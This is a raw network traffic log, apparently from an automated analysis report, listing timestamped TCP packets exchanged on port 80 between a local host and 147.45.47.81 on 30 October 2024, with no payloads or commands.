                                                              Oct 30, 2024 15:44:46.020107031 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.020227909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020261049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020304918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.020313025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020363092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020396948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020404100 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.020428896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020462990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020468950 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.020495892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020529032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020536900 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.020561934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020596981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020603895 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.020629883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020665884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.020673037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021097898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021142006 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021212101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021264076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021296978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021306992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021346092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021379948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021404982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021430969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021465063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021469116 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021497965 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021532059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021541119 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021565914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021599054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021600962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021631002 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021665096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021687984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021697044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021735907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021739960 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021769047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021802902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021810055 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021857977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021891117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021900892 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021923065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021956921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.021956921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.021991014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022032022 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022041082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022073030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022108078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022113085 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022140026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022173882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022182941 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022206068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022239923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022244930 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022273064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022309065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022314072 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022341013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022375107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022380114 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022408009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022440910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022445917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022475004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022510052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022540092 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022743940 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022794962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022806883 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022829056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022880077 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.022880077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022927999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.022977114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023010015 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023036003 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023044109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023058891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023076057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023113012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023147106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023180962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023205042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023214102 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023248911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023308039 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023509979 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023557901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023562908 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023612976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023648024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023653030 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023679972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023715019 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023720026 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023751974 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023792028 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023799896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023833990 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023866892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023874998 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023900986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023933887 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023940086 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.023967028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.023999929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024003029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024034023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024066925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024075985 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024102926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024136066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024142981 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024171114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024210930 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024389029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024422884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024472952 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024503946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024537086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024570942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024576902 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024605036 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024643898 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024655104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024688005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024723053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024728060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024755955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024789095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024792910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024821043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024854898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024862051 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024888992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024923086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024928093 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.024955988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024990082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.024996996 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025022984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025057077 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025063038 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025731087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025746107 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025762081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025778055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025789022 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025793076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025800943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025809050 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025815010 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025815964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025840044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025846958 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025856018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025871038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025887012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025892973 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025902033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025921106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025927067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.025937080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.025954008 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026004076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026031971 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026050091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026066065 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026099920 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026130915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026145935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026170969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026180983 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026186943 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026202917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026216984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026226997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026242971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026257038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026268005 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026272058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026293993 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026295900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026320934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026330948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026335955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026344061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026359081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026377916 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026384115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026398897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026413918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.026413918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.026434898 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027017117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027064085 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027081966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027096987 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027108908 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027116060 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027131081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027141094 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027158022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027173042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027173996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027194023 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027220011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027235031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027249098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027255058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027271986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027283907 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027287006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027309895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027333021 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027333975 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027348995 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027364016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027369976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027379036 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027399063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027404070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027419090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027442932 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.027914047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027939081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.027961969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.028022051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028043032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028054953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.028059006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028083086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028099060 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028114080 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.028121948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028135061 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.028136969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028151989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028171062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028176069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.028187037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028208017 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.028491020 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028517962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.028529882 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030085087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030133963 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030137062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030153036 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030186892 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030188084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030203104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030225992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030236959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030241013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030256987 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030275106 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030308008 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030323982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030339956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030343056 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030354023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030369043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030370951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030411959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030459881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030476093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030492067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030507088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030509949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030529022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030544043 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030545950 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030559063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030577898 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030581951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030597925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030612946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030616045 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030637026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030651093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030652046 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030659914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030667067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030680895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030694008 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030695915 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030713081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030719995 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030728102 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030739069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030742884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030769110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030807018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030822039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030838013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030846119 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030853033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030868053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030873060 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030883074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030900955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030903101 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030915976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030931950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030935049 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030946016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030962944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030970097 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.030977964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.030994892 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031481028 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031497955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031513929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031517982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031538963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031544924 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031553984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031569958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031584024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031590939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031608105 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031620979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031622887 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031640053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031655073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031658888 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.031668901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.031692028 CET8049995147.45.47.81192.168.2.6
